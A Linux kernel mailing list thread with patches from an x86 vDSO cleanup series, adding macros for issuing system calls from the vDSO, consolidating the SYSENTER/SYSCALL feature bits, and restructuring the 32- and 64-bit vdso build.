+++ b/arch/x86/include/asm/vdso/gettimeofday.h
@@ -18,6 +18,7 @@
#include <asm/msr.h>
#include <asm/pvclock.h>
#include <clocksource/hyperv_timer.h>
+#include <asm/vdso/sys_call.h>
#define VDSO_HAS_TIME 1
@@ -53,130 +54,37 @@ extern struct ms_hyperv_tsc_page hvclock_page
__attribute__((visibility("hidden")));
#endif
-#ifndef BUILD_VDSO32
-
static __always_inline
long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_gettime), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts);
}
static __always_inline
long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
struct timezone *_tz)
{
- long ret;
-
- asm("syscall" : "=a" (ret) :
- "0" (__NR_gettimeofday), "D" (_tv), "S" (_tz) : "memory");
-
- return ret;
+ return VDSO_SYSCALL2(gettimeofday,,_tv,_tz);
}
static __always_inline
long clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_getres), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,_time64,_clkid,_ts);
}
-#else
-
-static __always_inline
-long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
+#ifndef CONFIG_X86_64
static __always_inline
long clock_gettime32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
- struct timezone *_tz)
-{
- long ret;
-
- asm(
- "mov %%ebx, %%edx \n"
- "mov %2, %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret)
- : "0" (__NR_gettimeofday), "g" (_tv), "c" (_tz)
- : "memory", "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,,_clkid,_ts);
}
static __always_inline long
-clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres_time64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
+clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,,_clkid,_ts);
}
#endif
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
new file mode 100644
index 000000000000..dcfd17c6dd57
--- /dev/null
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -0,0 +1,103 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Macros for issuing an inline system call from the vDSO.
+ */
+
+#ifndef X86_ASM_VDSO_SYS_CALL_H
+#define X86_ASM_VDSO_SYS_CALL_H
+
+#include <linux/compiler.h>
+#include <asm/cpufeatures.h>
+#include <asm/alternative.h>
+
+#ifdef CONFIG_X86_64
+# define __sys_instr "syscall"
+# define __sys_clobber "rcx", "r11", "memory"
+# define __sys_nr(x,y) __NR_ ## x
+# define __sys_reg1 "rdi"
+# define __sys_reg2 "rsi"
+# define __sys_reg3 "rdx"
+# define __sys_reg4 "r10"
+# define __sys_reg5 "r8"
+#else
+# define __sys_instr "call __kernel_vsyscall"
+# define __sys_clobber "memory"
+# define __sys_nr(x,y) __NR_ ## x ## y
+# define __sys_reg1 "ebx"
+# define __sys_reg2 "ecx"
+# define __sys_reg3 "edx"
+# define __sys_reg4 "esi"
+# define __sys_reg5 "edi"
+#endif
+
+/*
+ * Example usage:
+ *
+ * result = VDSO_SYSCALL3(foo,64,x,y,z);
+ *
+ * ... calls foo(x,y,z) on 64 bits, and foo64(x,y,z) on 32 bits.
+ *
+ * VDSO_SYSCALL6() is currently missing, because it would require
+ * special handling for %ebp on 32 bits when the vdso is compiled with
+ * frame pointers enabled (the default on 32 bits.) Add it as a special
+ * case when and if it becomes necessary.
+ */
+#define _VDSO_SYSCALL(name,suf32,...) \
+ ({ \
+ long _sys_num_ret = __sys_nr(name,suf32); \
+ asm_inline volatile( \
+ __sys_instr \
+ : "+a" (_sys_num_ret) \
+ : __VA_ARGS__ \
+ : __sys_clobber); \
+ _sys_num_ret; \
+ })
+
+#define VDSO_SYSCALL0(name,suf32) \
+ _VDSO_SYSCALL(name,suf32)
+#define VDSO_SYSCALL1(name,suf32,a1) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1)); \
+ })
+#define VDSO_SYSCALL2(name,suf32,a1,a2) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2)); \
+ })
+#define VDSO_SYSCALL3(name,suf32,a1,a2,a3) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3)); \
+ })
+#define VDSO_SYSCALL4(name,suf32,a1,a2,a3,a4) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4)); \
+ })
+#define VDSO_SYSCALL5(name,suf32,a1,a2,a3,a4,a5) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ register long _sys_arg5 asm(__sys_reg5) = (long)(a5); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4), \
+ "r" (_sys_arg5)); \
+ })
+
+#endif /* X86_VDSO_SYS_CALL_H */
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:02 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
In most cases, the use of "fast 32-bit system call" depends either on
X86_FEATURE_SEP or X86_FEATURE_SYSENTER32 || X86_FEATURE_SYSCALL32.
However, nearly all the logic for both is identical.
Define X86_FEATURE_SYSFAST32 which indicates that *either* SYSENTER32 or
SYSCALL32 should be used, for either 32- or 64-bit kernels. This
defaults to SYSENTER; use SYSCALL if the SYSCALL32 bit is also set.
As this removes ALL existing uses of X86_FEATURE_SYSENTER32, which is
a kernel-only synthetic feature bit, simply remove it and replace it
with X86_FEATURE_SYSFAST32.
This leaves an unused alternative for a true 32-bit kernel, but that
should really not matter in any way.
The clearing of X86_FEATURE_SYSCALL32 can be removed once the patches
for automatically clearing disabled features has been merged.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Kconfig.cpufeatures | 8 +++++++
arch/x86/entry/vdso/vdso32/system_call.S | 8 ++-----
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/kernel/cpu/centaur.c | 3 ---
arch/x86/kernel/cpu/common.c | 8 +++++++
arch/x86/kernel/cpu/intel.c | 4 +---
arch/x86/kernel/cpu/zhaoxin.c | 4 +---
arch/x86/kernel/fred.c | 2 +-
arch/x86/xen/setup.c | 28 +++++++++++++++---------
arch/x86/xen/smp_pv.c | 5 ++---
arch/x86/xen/xen-ops.h | 1 -
11 files changed, 42 insertions(+), 31 deletions(-)
diff --git a/arch/x86/Kconfig.cpufeatures b/arch/x86/Kconfig.cpufeatures
index 733d5aff2456..423ac795baa7 100644
--- a/arch/x86/Kconfig.cpufeatures
+++ b/arch/x86/Kconfig.cpufeatures
@@ -56,6 +56,10 @@ config X86_REQUIRED_FEATURE_MOVBE
def_bool y
depends on MATOM
+config X86_REQUIRED_FEATURE_SYSFAST32
+ def_bool y
+ depends on X86_64 && !X86_FRED
+
config X86_REQUIRED_FEATURE_CPUID
def_bool y
depends on X86_64
@@ -120,6 +124,10 @@ config X86_DISABLED_FEATURE_CENTAUR_MCR
def_bool y
depends on X86_64
+config X86_DISABLED_FEATURE_SYSCALL32
+ def_bool y
+ depends on !X86_64
+
config X86_DISABLED_FEATURE_PCID
def_bool y
depends on !X86_64
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 2a15634bbe75..7b1c0f16e511 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,13 +52,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
-#else
- ALTERNATIVE "", SYSENTER_SEQUENCE, X86_FEATURE_SEP
-#endif
+ ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
+ SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
/* Enter using int $0x80 */
int $0x80
diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
index c3b53beb1300..63b0f9aa9b3e 100644
--- a/arch/x86/include/asm/cpufeatures.h
+++ b/arch/x86/include/asm/cpufeatures.h
@@ -84,7 +84,7 @@
#define X86_FEATURE_PEBS ( 3*32+12) /* "pebs" Precise-Event Based Sampling */
#define X86_FEATURE_BTS ( 3*32+13) /* "bts" Branch Trace Store */
#define X86_FEATURE_SYSCALL32 ( 3*32+14) /* syscall in IA32 userspace */
-#define X86_FEATURE_SYSENTER32 ( 3*32+15) /* sysenter in IA32 userspace */
+#define X86_FEATURE_SYSFAST32 ( 3*32+15) /* sysenter/syscall in IA32 userspace */
#define X86_FEATURE_REP_GOOD ( 3*32+16) /* "rep_good" REP microcode works well */
#define X86_FEATURE_AMD_LBR_V2 ( 3*32+17) /* "amd_lbr_v2" AMD Last Branch Record Extension Version 2 */
#define X86_FEATURE_CLEAR_CPU_BUF ( 3*32+18) /* Clear CPU buffers using VERW */
diff --git a/arch/x86/kernel/cpu/centaur.c b/arch/x86/kernel/cpu/centaur.c
index a3b55db35c96..9833f837141c 100644
--- a/arch/x86/kernel/cpu/centaur.c
+++ b/arch/x86/kernel/cpu/centaur.c
@@ -102,9 +102,6 @@ static void early_init_centaur(struct cpuinfo_x86 *c)
(c->x86 >= 7))
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
index e7ab22fce3b5..1c3261cae40c 100644
--- a/arch/x86/kernel/cpu/common.c
+++ b/arch/x86/kernel/cpu/common.c
@@ -1068,6 +1068,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
init_scattered_cpuid_features(c);
init_speculation_control(c);
+ if (IS_ENABLED(CONFIG_X86_64) || cpu_has(c, X86_FEATURE_SEP))
+ set_cpu_cap(c, X86_FEATURE_SYSFAST32);
+
/*
* Clear/Set all flags overridden by options, after probe.
* This needs to happen each time we re-probe, which may happen
@@ -1813,6 +1816,11 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
* that it can't be enabled in 32-bit mode.
*/
setup_clear_cpu_cap(X86_FEATURE_PCID);
+
+ /*
+ * Never use SYSCALL on a 32-bit kernel
+ */
+ setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
#endif
/*
diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
index 98ae4c37c93e..646ff33c4651 100644
--- a/arch/x86/kernel/cpu/intel.c
+++ b/arch/x86/kernel/cpu/intel.c
@@ -236,9 +236,7 @@ static void early_init_intel(struct cpuinfo_x86 *c)
clear_cpu_cap(c, X86_FEATURE_PSE);
}
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#else
+#ifndef CONFIG_X86_64
/* Netburst reports 64 bytes clflush size, but does IO in 128 bytes */
if (c->x86 == 15 && c->x86_cache_alignment == 64)
c->x86_cache_alignment = 128;
diff --git a/arch/x86/kernel/cpu/zhaoxin.c b/arch/x86/kernel/cpu/zhaoxin.c
index 89b1c8a70fe8..031379b7d4fa 100644
--- a/arch/x86/kernel/cpu/zhaoxin.c
+++ b/arch/x86/kernel/cpu/zhaoxin.c
@@ -59,9 +59,7 @@ static void early_init_zhaoxin(struct cpuinfo_x86 *c)
{
if (c->x86 >= 0x6)
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
+
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/fred.c b/arch/x86/kernel/fred.c
index 816187da3a47..e736b19e18de 100644
--- a/arch/x86/kernel/fred.c
+++ b/arch/x86/kernel/fred.c
@@ -68,7 +68,7 @@ void cpu_init_fred_exceptions(void)
idt_invalidate();
/* Use int $0x80 for 32-bit system calls in FRED mode */
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
}
diff --git a/arch/x86/xen/setup.c b/arch/x86/xen/setup.c
index 3823e52aef52..ac8021c3a997 100644
--- a/arch/x86/xen/setup.c
+++ b/arch/x86/xen/setup.c
@@ -990,13 +990,6 @@ static int register_callback(unsigned type, const void *func)
return HYPERVISOR_callback_op(CALLBACKOP_register, &callback);
}
-void xen_enable_sysenter(void)
-{
- if (cpu_feature_enabled(X86_FEATURE_SYSENTER32) &&
- register_callback(CALLBACKTYPE_sysenter, xen_entry_SYSENTER_compat))
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
-}
-
void xen_enable_syscall(void)
{
int ret;
@@ -1008,11 +1001,27 @@ void xen_enable_syscall(void)
mechanism for syscalls. */
}
- if (cpu_feature_enabled(X86_FEATURE_SYSCALL32) &&
- register_callback(CALLBACKTYPE_syscall32, xen_entry_SYSCALL_compat))
+ if (!cpu_feature_enabled(X86_FEATURE_SYSFAST32))
+ return;
+
+ if (cpu_feature_enabled(X86_FEATURE_SYSCALL32)) {
+ /* Use SYSCALL32 */
+ ret = register_callback(CALLBACKTYPE_syscall32,
+ xen_entry_SYSCALL_compat);
+
+ } else {
+ /* Use SYSENTER32 */
+ ret = register_callback(CALLBACKTYPE_sysenter,
+ xen_entry_SYSENTER_compat);
+ }
+
+ if (ret) {
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
+ }
}
+
static void __init xen_pvmmu_arch_setup(void)
{
HYPERVISOR_vm_assist(VMASST_CMD_enable, VMASST_TYPE_writable_pagetables);
@@ -1022,7 +1031,6 @@ static void __init xen_pvmmu_arch_setup(void)
register_callback(CALLBACKTYPE_failsafe, xen_failsafe_callback))
BUG();
- xen_enable_sysenter();
xen_enable_syscall();
}
diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
index 9bb8ff8bff30..c40f326f0c3a 100644
--- a/arch/x86/xen/smp_pv.c
+++ b/arch/x86/xen/smp_pv.c
@@ -65,10 +65,9 @@ static void cpu_bringup(void)
touch_softlockup_watchdog();
/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
- if (!xen_feature(XENFEAT_supervisor_mode_kernel)) {
- xen_enable_sysenter();
+ if (!xen_feature(XENFEAT_supervisor_mode_kernel))
xen_enable_syscall();
- }
+
cpu = smp_processor_id();
identify_secondary_cpu(cpu);
set_cpu_sibling_map(cpu);
diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
index 090349baec09..f6c331b20fad 100644
--- a/arch/x86/xen/xen-ops.h
+++ b/arch/x86/xen/xen-ops.h
@@ -60,7 +60,6 @@ phys_addr_t __init xen_find_free_area(phys_addr_t size);
char * __init xen_memory_setup(void);
void __init xen_arch_setup(void);
void xen_banner(void);
-void xen_enable_sysenter(void);
void xen_enable_syscall(void);
void xen_vcpu_restore(void);
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:03 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
- Separate out the vdso sources into common, vdso32, and vdso64
directories.
- Build the 32- and 64-bit vdsos in their respective subdirectories;
this greatly simplifies the build flags handling.
- Unify the mangling of Makefile flags between the 32- and 64-bit
vdso code as much as possible; all common rules are put in
arch/x86/entry/vdso/common/Makefile.include. The remaining
is very simple for 32 bits; the 64-bit one is only slightly more
complicated because it contains the x32 generation rule.
- Define __DISABLE_EXPORTS when building the vdso. This need seems to
have been masked by different ordering compile flags before.
- Change CONFIG_X86_64 to BUILD_VDSO32_64 in vdso32/system_call.S,
to make it compatible with including fake_32bit_build.h.
- The -fcf-protection= option was "leaking" from the kernel build,
for reasons that was not clear to me. Futhermore, several
distributions ship with it set to a default value other than
"-fcf-protection=none". Make it match the configuration options
for *user space*.
Note that this patch may seem large, but the vast majority of it is
simply code movement.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/Makefile | 161 +-----------------
arch/x86/entry/vdso/common/Makefile.include | 89 ++++++++++
.../entry/vdso/{vdso-note.S => common/note.S} | 5 +-
.../entry/vdso/{ => common}/vclock_gettime.c | 0
.../entry/vdso/{ => common}/vdso-layout.lds.S | 0
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/system_call.S | 2 +-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 +++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
